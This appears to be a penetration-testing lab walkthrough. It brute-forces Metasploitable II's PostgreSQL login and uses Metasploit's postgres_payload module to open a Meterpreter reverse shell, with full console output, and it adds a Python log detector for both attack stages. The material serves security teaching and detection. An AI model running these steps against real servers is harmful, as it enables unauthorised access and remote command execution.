Metasploitable II runs a PostgreSQL server. Our goal is to exploit that server in two steps to gain shell access on the remote host: first recover a valid login, then use it to run a payload.
We can use the postgres_login module to brute-force a valid login for the PostgreSQL server.
```
msf5 > use auxiliary/scanner/postgres/postgres_login
msf5 auxiliary(scanner/postgres/postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                                Required  Description
   ----              ---------------                                                                --------  -----------
   BLANK_PASSWORDS   false                                                                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                              yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                      yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                          no        Add all users in the current database to the list
   PASSWORD                                                                                         no        A specific password to authenticate with
   PASS_FILE         /home/sam/metasploit-framework/data/wordlists/postgres_default_pass.txt        no        File containing passwords, one per line
   Proxies                                                                                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                           no        Set to true to see query result sets
   RHOSTS                                                                                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT             5432                                                                           yes       The target port
   STOP_ON_SUCCESS   false                                                                          yes       Stop guessing when a credential works for a host
   THREADS           1                                                                              yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                         no        A specific username to authenticate as
   USERPASS_FILE     /home/sam/metasploit-framework/data/wordlists/postgres_default_userpass.txt    no        File containing (space-separated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                          no        Try the username as the password for all users
   USER_FILE         /home/sam/metasploit-framework/data/wordlists/postgres_default_user.txt        no        File containing users, one per line
   VERBOSE           true                                                                           yes       Whether to print output for all attempts

msf5 auxiliary(scanner/postgres/postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(scanner/postgres/postgres_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.101:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 192.168.56.101:5432 - Login Successful: postgres:postgres@template1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/postgres/postgres_login) >
```
As you can see, we found a valid login for the PostgreSQL server: the default postgres:postgres credentials. Now it's time to try to get a system shell. For this we will use the postgres_payload module of the Metasploit Framework, which authenticates with those credentials and runs a payload through the database.
```
msf5 > use exploit/linux/postgres/postgres_payload
msf5 exploit(linux/postgres/postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf5 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.101:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/JAkIxpbf.so, should be cleaned up automatically
[*] Sending stage (985320 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:47858) at 2020-02-15 11:27:10 -0700

meterpreter > shell
Process 4825 created.
Channel 1 created.
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)
python -c 'import pty;pty.spawn("/bin/bash")'
postgres@metasploitable:~/8.3/main$ pwd
pwd
/var/lib/postgresql/8.3/main
postgres@metasploitable:~/8.3/main$
```
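Both stages above leave a trail in the PostgreSQL server log that a defender can alert on: the brute force from the first stage shows up as a burst of failed password authentications from one client followed by an authorized connection, and the second stage loads a shared object from /tmp (the run output shows "Uploaded as /tmp/JAkIxpbf.so"), which on a server with DDL logging appears as a C-language function created from a library in a temporary directory. The following script is an added example, not part of the original post or of the Metasploit project. It assumes a log_line_prefix of '%t [%p] %h %u@%d ' with log_connections = on and log_statement = 'ddl' (an assumed logging configuration, not a PostgreSQL default), and the sample log lines, the statement shape and the thresholds are constructed for the illustration.

```python
"""Flag PostgreSQL password brute-forcing and C-function loads from temp dirs in server logs.

Added example for illustration only; not code from the post or from Metasploit.
Assumes log_line_prefix = '%t [%p] %h %u@%d ', log_connections = on,
log_statement = 'ddl'. All sample input below is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One log line under the assumed prefix: timestamp, tz, [pid], client host, user@db, level, message.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ \[(?P<pid>\d+)\] "
    r"(?P<host>\S+) (?P<user>[^@ ]*)@(?P<db>\S*) (?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
AUTH_FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]*)"')
AUTH_OK_RE = re.compile(r"connection authorized: user=(?P<user>\S+) database=(?P<db>\S+)")
# A C-language function whose object file lives in a world-writable temporary directory.
C_FUNC_RE = re.compile(
    r"CREATE (?:OR REPLACE )?FUNCTION .*? AS '(?P<lib>/(?:tmp|var/tmp|dev/shm)/[^']+)'.*?LANGUAGE C\b",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample log: five failures from one client, a success, then a library load.
SAMPLE_LOG = """\
2020-02-15 11:25:01 MST [4801] 192.168.56.1 postgres@template1 FATAL:  password authentication failed for user "postgres"
2020-02-15 11:25:02 MST [4802] 192.168.56.1 postgres@template1 FATAL:  password authentication failed for user "postgres"
2020-02-15 11:25:02 MST [4803] 192.168.56.1 postgres@template1 FATAL:  password authentication failed for user "postgres"
2020-02-15 11:25:03 MST [4804] 192.168.56.1 postgres@template1 FATAL:  password authentication failed for user "postgres"
2020-02-15 11:25:03 MST [4805] 192.168.56.1 postgres@template1 FATAL:  password authentication failed for user "postgres"
2020-02-15 11:25:04 MST [4806] 192.168.56.1 postgres@template1 LOG:  connection authorized: user=postgres database=template1
2020-02-15 11:27:09 MST [4820] 192.168.56.1 postgres@template1 LOG:  statement: CREATE OR REPLACE FUNCTION pg_temp.f() RETURNS void AS '/tmp/JAkIxpbf.so', 'f' LANGUAGE C STRICT
2020-02-15 11:30:00 MST [4830] 10.0.0.7 app@appdb LOG:  connection authorized: user=app database=appdb
"""


def parse_log(text):
    """Parse log text into dicts; lines that do not match the assumed prefix are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def detect_bruteforce(records, threshold=5, window=timedelta(minutes=5)):
    """Alert when one client host accumulates `threshold` auth failures inside `window`.

    The alert also notes whether the same host was authorized within `window`
    after the last failure, which is what a successful guess looks like.
    """
    fails, oks = defaultdict(list), defaultdict(list)
    for r in records:
        if r["level"] == "FATAL" and AUTH_FAIL_RE.search(r["msg"]):
            fails[r["host"]].append(r["ts"])
        elif AUTH_OK_RE.search(r["msg"]):
            oks[r["host"]].append(r["ts"])
    alerts = []
    for host, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted failure times
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                last = times[end]
                alerts.append({
                    "host": host,
                    "failures": end - start + 1,
                    "first": times[start],
                    "last": last,
                    "followed_by_success": any(last <= t <= last + window for t in oks.get(host, [])),
                })
                break  # one alert per host is enough for triage
    return alerts


def detect_library_load(records):
    """Return every logged CREATE FUNCTION that loads a C library from a temp directory."""
    hits = []
    for r in records:
        m = C_FUNC_RE.search(r["msg"])
        if m:
            hits.append({"ts": r["ts"], "host": r["host"], "user": r["user"], "library": m.group("lib")})
    return hits


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for a in detect_bruteforce(recs):
        print("brute force:", a)
    for h in detect_library_load(recs):
        print("library load:", h)
```

On the sample input this reports one brute-force alert for 192.168.56.1 (five failures, followed by an authorized connection) and one library load of /tmp/JAkIxpbf.so by the postgres user. Both detections depend on the logging settings named in the lead-in; without log_connections the success is invisible, and without log_statement = 'ddl' the CREATE FUNCTION never reaches the log.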
As you can see, we successfully got a shell back from the payload. Note that, as the id output shows, the shell runs as the unprivileged postgres user (uid=108), not as root.